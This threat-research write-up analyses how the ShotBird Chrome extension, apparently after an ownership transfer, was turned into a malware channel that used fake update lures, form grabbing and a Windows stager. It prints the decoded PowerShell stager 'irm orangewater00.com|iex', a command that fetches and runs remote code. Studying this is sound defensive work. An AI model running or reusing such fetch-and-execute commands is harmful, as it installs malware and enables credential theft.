From a Sophisticated Browser-Extension Supply-Chain Compromise to a VibeCoded Twist: A Chrome Extension as the Initial Access Vector for a Broader Malware Chain March 8, 2026 - browser extension security, threat research, incident response, c2 analysis, extension malware. This write-up documents how a Featured extension was turned into a callback-driven malware channel using remote task scripts, fake update lures, and form-data capture. Canonical repository: github.com/monxresearch-sec/shotbird-extension-malware-report Open to security research opportunities (full-time or contract). Contact: monxresearch@gmail.com TL;DR A formerly legitimate Featured Chrome extension ( ShotBird ) was turned into a remote-controlled malware channel after an apparent ownership transfer. The malicious version beaconed to attacker infrastructure, received callback-delivered JavaScript tasks, stripped browser security headers, injected fake Chrome update lures, and captured sensitive form data. In the observed Windows file-delivery path, victims were pushed to run googleupdate.exe , a fake update wrapper that carried a real Google-signed ChromeSetup.exe alongside a malicious psfx.msi stager. Host-side PowerShell 4104 logs later confirmed execution of the decoded stager irm orangewater00.com|iex and allowed reconstruction of a larger second stage with ETW suppression, Credential Manager access, Chromium data targeting, and upload logic. In short: this was not just extension abuse, but a browser-to-endpoint compromise chain with likely credential-theft capability. 1) Intro Extension Profile Field Value Extension Name ShotBird - Scrolling Screenshots, Tweet Images & Editor Extension ID gengfhhkjekmlejbhmmopegofnoifnjp Version (sample analyzed) 2.1 Manifest Version 3 Developer Email (current) loraprice198865@gmail.com Developer Email (pre-transfer) akshayanuonline@gmail.com Source: local manifest.json from the analyzed package and archived Chrome Web Store listing. Launch Timeline (Short) November 2024: launch period; public announcement around Nov 6 and Firefox listing on Nov 2 ( reddit ). January 17, 2025: Chrome Web Store version 1.1 published and highlighted as Featured ( chromewebstore.google ). June 19, 2025: version 1.4 rebrand to “ShotBird - Scrolling Screenshots, Tweet Images & Editor” ( chromewebstore.google ). December 9, 2025: last archived Chrome Web Store snapshot still shows original developer email akshayanuonline@gmail.com ( web.archive.org ). Currently (March): developer contact changed to loraprice198865@gmail.com , consistent with an ownership/operator transfer occurring between December 2025 and the malicious activity window. Notable Post-Launch Event By February 2026, public reporting on X claimed ownership transfer and later malicious behavior, matching a known extension supply-chain risk ( x ). 2) How I Found It I first caught this through amateur console logging left in callback-delivered scripts. (out of nowhere this started showing in chrome’s console in all sites) Examples observed: console . log ( ' Found update button ' ) console . log ( ' Update button clicked ' ) console . log ( ' initApp executed successfully ' ) console . warn ( ' Update button not found, retrying... ' ) console . log ( ' Setting up event handlers for mode: ' , updateData . mode ) console . log ( ' Found copy button ' ) console . log ( ' Copy button clicked ' ) console . log ( ' DOM fully loaded, setting up event handlers ' ) debugLog ( ' Initializing grabber... ' ) debugLog ( ' Grabber initialized ' ) debugLog ( `Found ${ inputs . length } form elements` ) What I found interesting about this: High-noise logs exposed behavior quickly in DevTools. debugLog() wrappers and mixed-language comments suggested low-opsec, likely AI-assisted payload assembly. Vibecoding indicators observed in callback payloads: Debug logging left throughout production payload code ( console.log , console.warn , debugLog ). Repeated // @ts-nocheck usage across scripts. Redundant retry/fallback patterns and duplicated handler wiring. Very large auto-expanded sensitive-input keyword list in the grabber. Russian-language artifacts: Inline Russian comments appeared in injected script blocks (example: // Запускаем initApp после загрузки DOM ). English code mixed with Russian comments is consistent with a Russian-language prompt/development workflow. This is evidence of likely Russian-speaking operators, not definitive proof of nationality or location. 3) Investigation Method Static review of local extension logic ( background.js , callback scripts). Live endpoint probing with self-registered UUIDs. Capture and review of callback-delivered scripts. Capture and review of remote template content from ggl.lat . Identifier policy in this article: Victim UUID masked as xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx . Probe UUIDs retained for reproducibility. 4) Findings At a Glance Four callback task families were observed: History/page metadata beaconing. Fake...